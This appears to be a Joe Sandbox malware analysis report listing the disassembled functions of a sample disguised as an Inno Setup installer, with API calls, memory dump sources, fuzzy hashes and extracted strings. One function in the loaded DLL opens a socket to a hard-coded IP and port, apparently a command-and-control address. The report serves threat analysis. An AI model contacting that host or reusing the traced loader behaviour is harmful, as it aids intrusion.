                                                                                    • Opcode ID: f0be303c8ae3a3db899ae323bf25bb91345b097c84c1ea8a1fe739e6adf72043
                                                                                    • Instruction ID: 36380bb8d2d00a5cd107783bbe8ece87911f5d12961edb049f33984dfb0094ad
                                                                                    • Opcode Fuzzy Hash: f0be303c8ae3a3db899ae323bf25bb91345b097c84c1ea8a1fe739e6adf72043
                                                                                    • Instruction Fuzzy Hash: 33316D71A04718ABDB20DB65CC81BDBB7B9EB44702F5004BAA608B32D1D7795E80CE9D
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,0060F3CE,?,00000000,00000000,?,0060F3E4,?,00613037), ref: 0060F355
                                                                                    • CoCreateInstance.OLE32(00661B20,00000000,00000001,00661B30,00000000,00000000,0060F3CE,?,00000000,00000000,?,0060F3E4,?,00613037), ref: 0060F37B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstanceVersion
                                                                                    • String ID:
                                                                                    • API String ID: 1462612201-0
                                                                                    • Opcode ID: 2b7efb7c08ec95d5ac9d012ecff19a46f0113b13660edf46e1a6b002756301d2
                                                                                    • Instruction ID: e6de0220a551c525d3073600045ea431ae85d93fb4f84d3b2f3a07f0fd70666f
                                                                                    • Opcode Fuzzy Hash: 2b7efb7c08ec95d5ac9d012ecff19a46f0113b13660edf46e1a6b002756301d2
                                                                                    • Instruction Fuzzy Hash: 1311C430244204EFDB28DBA5CC85F5AB7EAEB05314F514079F000E7AA1C7B4DD00CB95
APIs
• InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005B20B1
• SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005B20C1
  • Part of subcall function 00411CC8: CreateMutexW.KERNEL32(?,?,?,?,00650B47,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000), ref: 00411CDE
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: DescriptorSecurity$CreateDaclInitializeMutex
• String ID:
• API String ID: 3525989157-0
• Opcode ID: 96aa425f4f1ca6fb28b2fca93f9883b69411c115ce52dc2fb35b5bd094e7d832
• Instruction ID: 030b3d5056c1a35ec4f738022bc459d844e504157d5d076cb1adade252ba7484
• Opcode Fuzzy Hash: 96aa425f4f1ca6fb28b2fca93f9883b69411c115ce52dc2fb35b5bd094e7d832
• Instruction Fuzzy Hash: 6DE065B16443016FE700DF758C82F8B72DC9B44724F10492EB664D72D1F678D948879A
APIs
• GetSystemTimeAsFileTime.KERNEL32(0066978C), ref: 0060107D
• FileTimeToSystemTime.KERNEL32(?,?,0066978C), ref: 0060109D
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Time$FileSystem
• String ID:
• API String ID: 2086374402-0
• Opcode ID: 223c73414ae4cf3b518c4eaf210b6019ad5cc185f74778f8790ce031bb03a183
• Instruction ID: a7947e9422a9c24e952e4898eea57e5707ca9917051780ded715f0c801f4df47
• Opcode Fuzzy Hash: 223c73414ae4cf3b518c4eaf210b6019ad5cc185f74778f8790ce031bb03a183
• Instruction Fuzzy Hash: 40E0EC75D1020CABCB10EFE9D8468DFBBBCAB04314F4046A6B924E3351EB35A7518F95
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10016737
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
• Instruction ID: 772fdfb54747e28d4c8254296b593cf3c963f9d1e760632a41fcaf1a051b6687
• Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
• Instruction Fuzzy Hash: ABA128B1A10669CBEB15CF54CCC1BA9BBF4FB48364F19C62AE415AB290D374D984CF90
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CE670E
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
• Instruction ID: 4a6a6cfdbaa90df9778bc918d5a5eb58dc3a71a28aefceb535e5798b45eb39c9
• Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
• Instruction Fuzzy Hash: 7DA17EB2E10659CBEB19CF55C8C1BA9BBB1FB58364F19C22AE425E7250D334DA50CF90
APIs
• GetVersionExW.KERNEL32(?,00427178,00000000,00427190,?,?,004271AA,005B1257,00000000), ref: 00427118
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 235a6e9fecbdc768696314ba284c639279867603b6b7ed9726a9360dca84871d
• Instruction ID: 510de5ddbe74311da3514f823b091c3129d8178e497fae50679d1ee32f47e5c9
• Opcode Fuzzy Hash: 235a6e9fecbdc768696314ba284c639279867603b6b7ed9726a9360dca84871d
• Instruction Fuzzy Hash: 1AF01CB46013068FC340DF29F8416957BE6E744704F40962DF884C33A1E7B998448BA5
APIs
• GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,005FB7B8,?,00000001,00000000), ref: 005FB6CE
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: a7720191fadc5b59f9293200741afc173400299f42e44f13b71ffd044a7ac7a5
• Instruction ID: 32c953e8add9b443c25677096d2b0c3be2c19464cd60e54ae3a18f2e3060646b
• Opcode Fuzzy Hash: a7720191fadc5b59f9293200741afc173400299f42e44f13b71ffd044a7ac7a5
• Instruction Fuzzy Hash: CBD05EB150821CBEB60082EA9D82EB6B79CE708324F200612FB14C61C2E696EE015224
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
• Instruction ID: 0b686331e42d228877cee2e921b437bce4a8e5320232e9d9603cb742e160d61d
• Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
• Instruction Fuzzy Hash: EC317C76A083469FC710DF18C480A2AB7E4FF89318F29096EEA9597312D370FA558B91
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
• Instruction ID: e7cf9ad10a3c06237dd87dcbde6390057bb8d3fe26e0f0c9e2bb12da4eec98f8
• Opcode Fuzzy Hash: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
• Instruction Fuzzy Hash: A001C432B047110B870CDD3ECD9862AB6C3ABC8A10F09C63E9589C77C4CD318C1AC286
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
• Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
• Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
• Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                    • getaddrinfo.WS2_32(154.82.85.107,18852,?,00000000), ref: 100154FA
                                                                                    • WSACleanup.WS2_32 ref: 10015509
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                    • socket.WS2_32(?,?,?), ref: 10015552
                                                                                    • WSACleanup.WS2_32 ref: 10015566
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                    • String ID: 154.82.85.107$18852
                                                                                    • API String ID: 2357443324-1825080259
                                                                                    • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                    • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,10001A66,00000000,00000000,65E83C72,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016F29
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016F65
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,?,00000000,00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FA4
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 10016FAF
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FC0
                                                                                    • _com_issue_error.COMSUPP ref: 10016FD8
                                                                                    • _com_issue_error.COMSUPP ref: 10016FE2
                                                                                    • GetLastError.KERNEL32(80070057,65E83C72,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016FE7
                                                                                    • _com_issue_error.COMSUPP ref: 10016FFA
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017008
                                                                                    • GetLastError.KERNEL32(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017010
                                                                                    • _com_issue_error.COMSUPP ref: 10017023
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
                                                                                    • String ID: r<e
                                                                                    • API String ID: 2710271231-3210016143
                                                                                    • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                    • Instruction ID: 6285890bd5176054e2d15964e4e0697efcddc290ec620ce681aa416c4b1e3c3a
                                                                                    • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                    • Instruction Fuzzy Hash: EA41C3B5A00219ABD700CFA8DC45B9EBBE9FB4C650F114229F509EB281D735E981CBA0
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000,?,0065134E,00000000,00651358,?,00000000), ref: 00650B2F
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000), ref: 00650B55
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF), ref: 00650B76
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000), ref: 00650B8B
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                    • API String ID: 66301061-3672972446
                                                                                    • Opcode ID: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction ID: 454a7f8a8ebd9c9c0472cbc412e74aa99abd709555709b689d3e6ddf3cb357b8
                                                                                    • Opcode Fuzzy Hash: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction Fuzzy Hash: 9491E430A042099FEB10EBA4C856BEEBBF6EF49301F614864FD00A7791DA75ED49CB54
                                                                                    APIs
                                                                                    • CoTaskMemFree.OLE32(?,00644047,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064403A
                                                                                    • CoTaskMemFree.OLE32(?,0064409A,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064408D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 734271698-544719455
                                                                                    • Opcode ID: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction ID: dd5fc3daa821dda1b6518f9a5080d1dcac5ab9c80f6433aa49f69c11db3ec318
                                                                                    • Opcode Fuzzy Hash: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction Fuzzy Hash: 7A8167346002459BDB10EFE4DC46BAE7BA7EB84704F60542AE400B7792CEB8AD55CF66
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00CD1659
                                                                                      • Part of subcall function 00CD1407: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 00CD1462
                                                                                      • Part of subcall function 00CD1407: CoTaskMemFree.COMBASE(00000000), ref: 00CD14B5
                                                                                    • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 00CD176F
                                                                                    • RegisterClassW.USER32(?), ref: 00CD17CE
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 00CD17D6
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00CD17E9
                                                                                    • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 00CD1835
                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?), ref: 00CD1844
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CD186B
